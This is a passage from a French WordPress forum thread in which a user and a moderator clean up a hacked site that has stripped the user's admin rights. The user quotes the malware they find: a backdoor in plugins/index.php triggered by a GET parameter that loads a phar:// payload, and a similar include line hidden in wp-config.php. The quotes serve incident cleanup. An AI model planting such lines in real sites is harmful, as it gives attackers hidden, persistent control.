[Résolu] Perte des droits administrateur (Créer un compte)

  • WordPress: 5.8
  • Statut : résolu
9 sujets de 16 à 24 (sur un total de 24)
  • Auteur
    Messages
  • #2400282
    floperret
    Participant
    WordPress Initiate
    18 contributions

    J’ai pu contacter un administrateur, qui m’a dit que la console qui s’affichait était un « rootkit », le site ayant été piraté. Il a réussi à restaurer une sauvegarde plus ancienne et la console a disparu. Malheureusement, je n’ai toujours pas accès au rôle admin, et il ne sait pas comment m’aider au delà de ça..

    #2400312
    ferman
    Modérateur
    WordPress Master
    7216 contributions

    S’il y a eu piratage, vous avez déjà fait la plupart des choses prévues en ce cas (changer wp-includes et wp_admin + les fichiers hors dossiers). Il reste à vérifier quelques autres fichiers/dossiers que vous n’avez pas changés qui peuvent aussi être piratés.

    wp-content / upload: contient essentiellement des images et aucun fichier php ou js.

    wp-config: vérifier qu’il n’y a pas de lignes anormales en tête ou à la fin du fichier.

    functions.php (mais si vous avez déjà changé de thème sans résultat ça ne devrait pas être ça. Regardez quand même).

    Avez vous essayé de vous recréer encore une fois un administrateur dans la nouvelle base de données? Je suppose qu’il n’y a pas d’administrateur fantôme dans cette base de données.

     

     

     

     

    #2400315
    floperret
    Participant
    WordPress Initiate
    18 contributions

    Dans le dossier principal, au milieu de tous les fichiers hors dossier, il y a un fichier « wp-kaylin.php » qui m’interpelle, je n’ai jamais vu ce nom et je n’arrive pas à l’ouvrir. C’est aussi le fichier le plus lourd de la liste, il fait 89 319 octets. Je l’avais déjà remarqué avant de réinstaller wordpress comme vous me l’aviez conseillé, je l’avais supprimé et j’ai l’impression qu’il a réapparu depuis.

    Je ne vois rien d’anormal dans wp-config.

    Dans wp-content, j’ai mes différents dossiers correspondant à chaque année, ainsi qu’un dossier « wp-file-manager-pro », ce qui m’étonne également puisque d’après mes recherches c’est un plugin, qui n’apparait pas dans la liste des plugins du site ni dans le bon dossier ici. La date de la dernière modification du dossier coïncide avec celle du fameux « wp-kaylin » cité plus haut. A l’intérieur de ce dossier, il y a un fichier .htaccess ainsi qu’un index.html vide.

    Le .htaccess contient juste ces lignes de code :

    <FilesMatch « \.(zip|gz)$ »>
    Order allow,deny
    Deny from all
    </Files>

    Dans mon dossier plugins, il y a un dossier pour chaque plugin, et juste un fichier index.php hors dossier, dont la date de la dernière modification coïncide encore une fois, et dont le code est le suivant

    <?php
    if($_GET[« sd »] == »sd »)
    {
    require(‘phar:///www/missionspro/missionspro.unistra.fr/conf/php/fisd.ini/filecontral-change2.php’);

    }
    // Silence is golden.

    Est-ce que certains de ces fichiers vous semblent louches ? Dans le reste du dossier wp-content, je ne vois autrement que des photos.

    J’ai aussi essayé de créer un nouveau profil administrateur depuis la nouvelle base de donnée, sans succès encore une fois.

    • Cette réponse a été modifiée le il y a 2 années et 7 mois par floperret.
    • Cette réponse a été modifiée le il y a 2 années et 7 mois par floperret.
    • Cette réponse a été modifiée le il y a 2 années et 7 mois par floperret.
    #2400324
    ferman
    Modérateur
    WordPress Master
    7216 contributions

    Est-ce que certains de ces fichiers vous semblent louches ?

    Très louches; ce sont certainement des fichiers correspondant à un piratage. Faites d’abord une sauvegarde de votre base de données et des dossiers du site. Ensuite supprimez tous les thèmes non actifs de votre site (mais gardez un thème par défaut par exemple twenty-twentyone ; pas twenty-twentytwo). Ensuite il faut supprimer » wp-file-manager-pro » qui n’a rien à faire dans wp-contents/upload et  « wp-kaylin.php » (. Vérifiez aussi index.php et .htaccess.  Re-téléchargez une version fraîche de votre thème (attention: si vous y avez fait des personnalisations importantes vous les perdrez d’où l’intérêt de la sauvegarde ). Pareil pour les extensions. Regardez aussi la base de données  , nettoyez éventuellement et changez son mot de passe. Et dites-nous ce que vous voyez d’anormal.

    CECI pourra aussi vous intéresser (ressemble à ce que vous voyez).

    • Cette réponse a été modifiée le il y a 2 années et 7 mois par ferman.
    #2400327
    floperret
    Participant
    WordPress Initiate
    18 contributions

    J’ai supprimé tous les fichiers suspects, et ai procédé à un scan avec sucuri qui m’en a donné 4 autres à supprimer également, tous créés à des dates similaires. Cela n’a cependant pas résolu le problème et il m’est toujours impossible d’avoir les droits admin..

    J’ai constaté dans ma base de données qu’il y avait une table « wp_wpfm_backup », dois-je également la supprimer ?

    Merci

    #2400329
    ferman
    Modérateur
    WordPress Master
    7216 contributions

    Oui vous pouvez supprimer cette table. Elle correspond à file manager.

    Vous avez bien fait tout le reste? Revérifiez si le fichier wp-kaylin.php  est revenu. Comment est le fichier .htaccess en tête de votre site? Il devrait être comme indiqué ICI , paragraphe « .htaccess à la racine du site ». Si vous n’en avez pas mis il ne devrait pas y  en avoir d’autre.

    #2400362
    floperret
    Participant
    WordPress Initiate
    18 contributions

    Bonjour,

    J’ai bien supprimé la table. Mon fichier .htaccess n’était pas exactement comme celui dans l’article que vous avez envoyé, je l’ai donc modifié. Malheureusement, le problème reste le même..

    #2400371
    floperret
    Participant
    WordPress Initiate
    18 contributions

    C’est bon, j’ai réussi à régler le problème !

    Il restait une ligne étrange dans wp-config que je n’avais pas vue. Voici le code :

    include(‘phar:///www/missionspro/missionspro.unistra.fr/logs/2021/.missyou.ini/missionspro.php’);

    En la supprimant, j’ai à nouveau accès à mon rôle admin.

    Merci encore d’avoir pris le temps de m’aider ! Très bonne journée à vous

    #2400376
    ferman
    Modérateur
    WordPress Master
    7216 contributions

    En la supprimant, j’ai à nouveau accès à mon rôle admin.

    Avec tout ce que vous avez fait je pense que le nettoyage est complet Vous verrez si ça revient auquel cas vous connaissez la procédure. C’était quand même une infection tordue, non classique et non repérée par Sucuri; heureusement que votre administrateur l’a repérée autrement ça aurait été nettement plus long pour identifier la cause du problème. Je garde en mémoire pour un usage futur éventuel.

    • Cette réponse a été modifiée le il y a 2 années et 7 mois par ferman.
9 sujets de 16 à 24 (sur un total de 24)
  • Vous devez être connecté pour répondre à ce sujet.